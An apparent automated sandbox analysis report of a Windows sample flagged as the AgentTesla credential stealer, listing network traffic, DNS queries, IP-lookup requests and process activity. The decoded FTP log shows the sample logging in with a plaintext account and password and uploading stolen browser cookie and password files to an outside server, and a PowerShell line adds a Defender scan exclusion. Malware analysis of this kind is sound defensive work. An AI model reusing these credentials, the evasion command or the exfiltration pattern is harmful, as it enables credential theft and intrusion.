                                                                                                              Jan 11, 2025 04:21:21.729042053 CET44349751104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:21.729242086 CET44349751104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:21.776735067 CET49751443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:21.819329023 CET44349751104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:21.888638020 CET44349751104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:21.888719082 CET44349751104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:21.888781071 CET49751443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:21.891444921 CET49751443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:22.316199064 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:22.321165085 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:22.321232080 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:22.861179113 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:22.861378908 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:22.866276979 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.009325027 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.009464979 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:23.014549017 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.256390095 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.256511927 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:23.261555910 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.402278900 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.402451992 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:23.407428026 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.548365116 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.548624992 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:23.554259062 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.695213079 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.695348978 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:23.700189114 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.845820904 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.846385956 CET4975347402192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:23.851361036 CET4740249753192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:23.851672888 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:23.851764917 CET4975347402192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:23.856672049 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:24.331221104 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:24.331495047 CET4975347402192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:24.331496000 CET4975347402192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:24.336352110 CET4740249753192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:24.336585045 CET4740249753192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:24.336766958 CET4975347402192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:24.373681068 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:24.477792025 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:24.500842094 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:24.506234884 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:24.647654057 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:24.648118973 CET4975447859192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:24.653053999 CET4785949754192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:24.653137922 CET4975447859192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:24.653223991 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:24.658118963 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.132091999 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.132297039 CET4975447859192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.132334948 CET4975447859192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.137208939 CET4785949754192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.137219906 CET4785949754192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.137228966 CET4785949754192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.137505054 CET4785949754192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.137546062 CET4975447859192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.186222076 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.278572083 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.278881073 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.283890963 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.424976110 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.425452948 CET4975538674192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.430371046 CET3867449755192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.430489063 CET4975538674192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.430588961 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.435503960 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.891190052 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.894134998 CET4975538674192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.899239063 CET3867449755192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:25.899306059 CET4975538674192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:25.936206102 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:26.040491104 CET2149752192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:26.092502117 CET4975221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:23:07.382989883 CET5002221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:23:07.387878895 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:07.388004065 CET5002221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:23:07.949067116 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:07.952410936 CET5002221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:23:07.957189083 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:08.102293015 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:08.104441881 CET5002221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:23:08.109316111 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:08.357089043 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:08.357443094 CET5002221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:23:08.362287045 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:08.507328987 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:08.507504940 CET5002221192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:23:08.512336016 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:08.657403946 CET2150022192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:23:08.702131987 CET5002221192.168.2.4192.254.225.136
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 04:21:01.559900045 CET5200053192.168.2.41.1.1.1
                                                                                                              Jan 11, 2025 04:21:01.566987991 CET53520001.1.1.1192.168.2.4
                                                                                                              Jan 11, 2025 04:21:02.888674974 CET5705553192.168.2.41.1.1.1
                                                                                                              Jan 11, 2025 04:21:03.323548079 CET53570551.1.1.1192.168.2.4
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 11, 2025 04:21:01.559900045 CET192.168.2.41.1.1.10xb961Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:21:02.888674974 CET192.168.2.41.1.1.10xd638Standard query (0)ftp.ercolina-usa.comA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 11, 2025 04:21:01.566987991 CET1.1.1.1192.168.2.40xb961No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:21:01.566987991 CET1.1.1.1192.168.2.40xb961No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:21:01.566987991 CET1.1.1.1192.168.2.40xb961No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:21:03.323548079 CET1.1.1.1192.168.2.40xd638No error (0)ftp.ercolina-usa.comercolina-usa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:21:03.323548079 CET1.1.1.1192.168.2.40xd638No error (0)ercolina-usa.com192.254.225.136A (IP address)IN (0x0001)false
                                                                                                              • api.ipify.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449732104.26.12.2054437568C:\Users\user\Desktop\iNFGd6bDZX.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:21:02 UTC155OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                              Host: api.ipify.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-11 03:21:02 UTC424INHTTP/1.1 200 OK
                                                                                                              Date: Sat, 11 Jan 2025 03:21:02 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 12
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9001c63cca8743f3-EWR
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1763&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1656267&cwnd=213&unsent_bytes=0&cid=f07c23faa9b919af&ts=210&x=0"
                                                                                                              2025-01-11 03:21:02 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                              Data Ascii: 8.46.123.189


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.449740104.26.12.2054438056C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:21:13 UTC155OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                              Host: api.ipify.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-11 03:21:13 UTC424INHTTP/1.1 200 OK
                                                                                                              Date: Sat, 11 Jan 2025 03:21:13 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 12
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9001c6845fa641c1-EWR
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1574&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1800246&cwnd=205&unsent_bytes=0&cid=5aec6d029123109d&ts=181&x=0"
                                                                                                              2025-01-11 03:21:13 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                              Data Ascii: 8.46.123.189


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.449751104.26.12.2054434192C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:21:21 UTC155OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                              Host: api.ipify.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-11 03:21:21 UTC424INHTTP/1.1 200 OK
                                                                                                              Date: Sat, 11 Jan 2025 03:21:21 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 12
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9001c6b76efa8c7b-EWR
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2013&rtt_var=775&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1393129&cwnd=186&unsent_bytes=0&cid=660cdec4dac77fd0&ts=166&x=0"
                                                                                                              2025-01-11 03:21:21 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                              Data Ascii: 8.46.123.189


                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                              Jan 11, 2025 04:21:04.064600945 CET2149735192.254.225.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                              Jan 11, 2025 04:21:04.064807892 CET4973521192.168.2.4192.254.225.136USER ben@ercolina-usa.com
                                                                                                              Jan 11, 2025 04:21:04.211875916 CET2149735192.254.225.136192.168.2.4331 User ben@ercolina-usa.com OK. Password required
                                                                                                              Jan 11, 2025 04:21:04.212030888 CET4973521192.168.2.4192.254.225.136PASS nXe0M~WkW&nJ
                                                                                                              Jan 11, 2025 04:21:04.464126110 CET2149735192.254.225.136192.168.2.4230 OK. Current restricted directory is /
                                                                                                              Jan 11, 2025 04:21:04.610708952 CET2149735192.254.225.136192.168.2.4504 Unknown command
                                                                                                              Jan 11, 2025 04:21:04.610861063 CET4973521192.168.2.4192.254.225.136PWD
                                                                                                              Jan 11, 2025 04:21:04.756031990 CET2149735192.254.225.136192.168.2.4257 "/" is your current location
                                                                                                              Jan 11, 2025 04:21:04.756161928 CET4973521192.168.2.4192.254.225.136TYPE I
                                                                                                              Jan 11, 2025 04:21:04.903832912 CET2149735192.254.225.136192.168.2.4200 TYPE is now 8-bit binary
                                                                                                              Jan 11, 2025 04:21:04.904047012 CET4973521192.168.2.4192.254.225.136PASV
                                                                                                              Jan 11, 2025 04:21:05.049140930 CET2149735192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,152,22)
                                                                                                              Jan 11, 2025 04:21:05.055555105 CET4973521192.168.2.4192.254.225.136STOR CO_Chrome_Default.txt_user-830021_2025_01_10_22_51_01.txt
                                                                                                              Jan 11, 2025 04:21:05.532484055 CET2149735192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                              Jan 11, 2025 04:21:05.678498030 CET2149735192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                              226-File successfully transferred226 0.146 seconds (measured here), 22.44 Kbytes per second
                                                                                                              Jan 11, 2025 04:21:05.678908110 CET4973521192.168.2.4192.254.225.136PASV
                                                                                                              Jan 11, 2025 04:21:05.825026989 CET2149735192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,192,230)
                                                                                                              Jan 11, 2025 04:21:05.833170891 CET4973521192.168.2.4192.254.225.136STOR CO_Firefox_fqs92o4p.default-release.txt_user-830021_2025_01_11_02_00_30.txt
                                                                                                              Jan 11, 2025 04:21:06.298521042 CET2149735192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                              Jan 11, 2025 04:21:06.444796085 CET2149735192.254.225.136192.168.2.4226 File successfully transferred
                                                                                                              Jan 11, 2025 04:21:15.081118107 CET2149741192.254.225.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:21. Server port: 21.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                              Jan 11, 2025 04:21:15.081290007 CET4974121192.168.2.4192.254.225.136USER ben@ercolina-usa.com
                                                                                                              Jan 11, 2025 04:21:15.227514029 CET2149741192.254.225.136192.168.2.4331 User ben@ercolina-usa.com OK. Password required
                                                                                                              Jan 11, 2025 04:21:15.227643013 CET4974121192.168.2.4192.254.225.136PASS nXe0M~WkW&nJ
                                                                                                              Jan 11, 2025 04:21:15.485028028 CET2149741192.254.225.136192.168.2.4230 OK. Current restricted directory is /
                                                                                                              Jan 11, 2025 04:21:15.631519079 CET2149741192.254.225.136192.168.2.4504 Unknown command
                                                                                                              Jan 11, 2025 04:21:15.632368088 CET4974121192.168.2.4192.254.225.136PWD
                                                                                                              Jan 11, 2025 04:21:15.778208971 CET2149741192.254.225.136192.168.2.4257 "/" is your current location
                                                                                                              Jan 11, 2025 04:21:15.778373003 CET4974121192.168.2.4192.254.225.136TYPE I
                                                                                                              Jan 11, 2025 04:21:15.924542904 CET2149741192.254.225.136192.168.2.4200 TYPE is now 8-bit binary
                                                                                                              Jan 11, 2025 04:21:15.925431967 CET4974121192.168.2.4192.254.225.136PASV
                                                                                                              Jan 11, 2025 04:21:16.071548939 CET2149741192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,165,9)
                                                                                                              Jan 11, 2025 04:21:16.078440905 CET4974121192.168.2.4192.254.225.136STOR PW_user-830021_2025_01_10_22_21_13.html
                                                                                                              Jan 11, 2025 04:21:16.551496029 CET2149741192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                              Jan 11, 2025 04:21:16.699701071 CET2149741192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                              226-File successfully transferred226 0.148 seconds (measured here), 2.29 Kbytes per second
                                                                                                              Jan 11, 2025 04:21:16.721009970 CET4974121192.168.2.4192.254.225.136PASV
                                                                                                              Jan 11, 2025 04:21:16.867297888 CET2149741192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,192,174)
                                                                                                              Jan 11, 2025 04:21:16.872740984 CET4974121192.168.2.4192.254.225.136STOR CO_Chrome_Default.txt_user-830021_2025_01_11_01_20_56.txt
                                                                                                              Jan 11, 2025 04:21:17.344033957 CET2149741192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                              Jan 11, 2025 04:21:17.491111040 CET2149741192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                              226-File successfully transferred226 0.148 seconds (measured here), 22.16 Kbytes per second
                                                                                                              Jan 11, 2025 04:21:17.491470098 CET4974121192.168.2.4192.254.225.136PASV
                                                                                                              Jan 11, 2025 04:21:17.637845039 CET2149741192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,140,225)
                                                                                                              Jan 11, 2025 04:21:17.643291950 CET4974121192.168.2.4192.254.225.136STOR CO_Firefox_fqs92o4p.default-release.txt_user-830021_2025_01_11_02_20_41.txt
                                                                                                              Jan 11, 2025 04:21:18.114681959 CET2149741192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                              Jan 11, 2025 04:21:18.262296915 CET2149741192.254.225.136192.168.2.4226 File successfully transferred
                                                                                                              Jan 11, 2025 04:21:22.861179113 CET2149752192.254.225.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 22:21. Server port: 21.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                              Jan 11, 2025 04:21:22.861378908 CET4975221192.168.2.4192.254.225.136USER ben@ercolina-usa.com
                                                                                                              Jan 11, 2025 04:21:23.009325027 CET2149752192.254.225.136192.168.2.4331 User ben@ercolina-usa.com OK. Password required
                                                                                                              Jan 11, 2025 04:21:23.009464979 CET4975221192.168.2.4192.254.225.136PASS nXe0M~WkW&nJ
                                                                                                              Jan 11, 2025 04:21:23.256390095 CET2149752192.254.225.136192.168.2.4230 OK. Current restricted directory is /
                                                                                                              Jan 11, 2025 04:21:23.402278900 CET2149752192.254.225.136192.168.2.4504 Unknown command
                                                                                                              Jan 11, 2025 04:21:23.402451992 CET4975221192.168.2.4192.254.225.136PWD
                                                                                                              Jan 11, 2025 04:21:23.548365116 CET2149752192.254.225.136192.168.2.4257 "/" is your current location
                                                                                                              Jan 11, 2025 04:21:23.548624992 CET4975221192.168.2.4192.254.225.136TYPE I
                                                                                                              Jan 11, 2025 04:21:23.695213079 CET2149752192.254.225.136192.168.2.4200 TYPE is now 8-bit binary
                                                                                                              Jan 11, 2025 04:21:23.695348978 CET4975221192.168.2.4192.254.225.136PASV
                                                                                                              Jan 11, 2025 04:21:23.845820904 CET2149752192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,185,42)
                                                                                                              Jan 11, 2025 04:21:23.851672888 CET4975221192.168.2.4192.254.225.136STOR PW_user-830021_2025_01_10_22_21_21.html
                                                                                                              Jan 11, 2025 04:21:24.331221104 CET2149752192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                              Jan 11, 2025 04:21:24.477792025 CET2149752192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                              226-File successfully transferred226 0.146 seconds (measured here), 2.32 Kbytes per second
                                                                                                              Jan 11, 2025 04:21:24.500842094 CET4975221192.168.2.4192.254.225.136PASV
                                                                                                              Jan 11, 2025 04:21:24.647654057 CET2149752192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,186,243)
                                                                                                              Jan 11, 2025 04:21:24.653223991 CET4975221192.168.2.4192.254.225.136STOR CO_Chrome_Default.txt_user-830021_2025_01_11_01_31_02.txt
                                                                                                              Jan 11, 2025 04:21:25.132091999 CET2149752192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                              Jan 11, 2025 04:21:25.278572083 CET2149752192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                              226-File successfully transferred226 0.146 seconds (measured here), 22.42 Kbytes per second
                                                                                                              Jan 11, 2025 04:21:25.278881073 CET4975221192.168.2.4192.254.225.136PASV
                                                                                                              Jan 11, 2025 04:21:25.424976110 CET2149752192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,151,18)
                                                                                                              Jan 11, 2025 04:21:25.430588961 CET4975221192.168.2.4192.254.225.136STOR CO_Firefox_fqs92o4p.default-release.txt_user-830021_2025_01_11_02_40_44.txt
                                                                                                              Jan 11, 2025 04:21:25.891190052 CET2149752192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                              Jan 11, 2025 04:21:26.040491104 CET2149752192.254.225.136192.168.2.4226 File successfully transferred
                                                                                                              Jan 11, 2025 04:23:07.949067116 CET2150022192.254.225.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:23. Server port: 21.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:23. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:23. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                              Jan 11, 2025 04:23:07.952410936 CET5002221192.168.2.4192.254.225.136USER ben@ercolina-usa.com
                                                                                                              Jan 11, 2025 04:23:08.102293015 CET2150022192.254.225.136192.168.2.4331 User ben@ercolina-usa.com OK. Password required
                                                                                                              Jan 11, 2025 04:23:08.104441881 CET5002221192.168.2.4192.254.225.136PASS nXe0M~WkW&nJ
                                                                                                              Jan 11, 2025 04:23:08.357089043 CET2150022192.254.225.136192.168.2.4230 OK. Current restricted directory is /
                                                                                                              Jan 11, 2025 04:23:08.507328987 CET2150022192.254.225.136192.168.2.4504 Unknown command
                                                                                                              Jan 11, 2025 04:23:08.507504940 CET5002221192.168.2.4192.254.225.136PWD
                                                                                                              Jan 11, 2025 04:23:08.657403946 CET2150022192.254.225.136192.168.2.4257 "/" is your current location

                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:22:20:57
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\iNFGd6bDZX.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\iNFGd6bDZX.exe"
                                                                                                              Imagebase:0x200000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:22:20:59
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"
                                                                                                              Imagebase:0x260000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:22:21:00
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\iNFGd6bDZX.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\Desktop\iNFGd6bDZX.exe"
                                                                                                              Imagebase:0x440000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
